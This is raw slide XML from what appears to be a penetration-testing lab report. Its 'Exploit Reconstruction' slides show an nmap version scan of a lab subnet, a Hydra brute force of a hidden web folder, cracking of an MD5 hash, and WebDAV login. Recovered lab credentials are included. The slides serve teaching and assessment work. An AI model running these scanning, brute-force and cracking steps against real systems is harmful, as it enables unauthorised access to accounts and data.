            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>**Scan for open ports and Versions / and OS Detection**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; nmap –sV 192.168.1.1-105</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   Results: &gt; 192.168.1.1 – found open ports 135/tcp, 139/tcp, 445/tcp, 2179/tcp, and 3389/tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            &gt; 192.168.1.100 – found open ports 22/tcp (ssh) OpenSSH 7.6p1 Ubuntu, 9200/tcp (http) Elasticsearch REST API 7.6.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            &gt; 192.168.1.105 – found open ports 22/tcp (ssh) OpenSSH 7.6p1 Ubuntu, 80/tcp (http) Apache httpd 2.4.29 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            (file located for Ashton: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/meet_our_team/ashton.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            &gt; 192.168.1.90 – found open ports 22/tcp (ssh) OpenSSH 8.1p1 Debian 5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Graphical user interface&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC73659F-E2E4-45DE-8B49-9F0A9E0D0041}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="702363" y="1713364"/>
            <a:ext cx="5963482" cy="1438476"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1580220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Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Network Topology</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EDA9A58-6383-49AF-8BC2-D1ED7B8E60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716674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F843F-EF1A-4FE4-89E0-698CB35ED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3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F34BBE8-6472-4E71-ADAF-46E0FE0C0088}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Appendix : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploit Reconstruction – Code and Resources</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1800" dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Subtitle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{602BF427-D4E8-42FA-AA59-538912300FD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Continued…</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB0E4B19-D40F-4250-9DD6-730102A8F0BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="3625680"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>**Brute force the password for the hidden directory using Hydra**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  Results: [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http-get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>] host: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.105</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   login: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ashton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   password: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>leopoldo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	- Login to secret folder: 192.168.1.105/company_folders/secret_folder/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		login:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ashton</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		password: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>leopoldo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access to the hidden files in secret_folder with hash password for ryan’s account, and instructions to WebDAV.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4C5A28F-5B48-45E3-B9AA-954A3C7DBD0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="768626" y="1489568"/>
            <a:ext cx="8101049" cy="163285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F672A87D-87D4-4956-8839-869904020DCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1418785" y="1765139"/>
            <a:ext cx="6306430" cy="638264"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="Graphical user interface, text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BDC6BCE-AF0D-4CA3-9BD6-33D8ABEF152C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3796747" y="2609674"/>
            <a:ext cx="3836505" cy="1088558"/>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4A51B57D-A84D-4451-95C3-88E40F28475F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1477615" y="3978788"/>
            <a:ext cx="2749827" cy="1159182"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3464537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F843F-EF1A-4FE4-89E0-698CB35ED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3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F34BBE8-6472-4E71-ADAF-46E0FE0C0088}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Appendix : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploit Reconstruction – Code and Resources</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1800" dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Subtitle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{602BF427-D4E8-42FA-AA59-538912300FD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Continued…</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB0E4B19-D40F-4250-9DD6-730102A8F0BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="3625680"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Break the hashed password for Ryan’s credentials discovered in hidden file using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://crackstation.net/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	Hash			Type	Result</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>d7dad0a5cd7c8376eeb50d69b3ccd352</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	md5	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>linux4u</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Connect to the server via WebDAV</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.105/webdav/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	login:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ryan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	password: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>linux4u</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
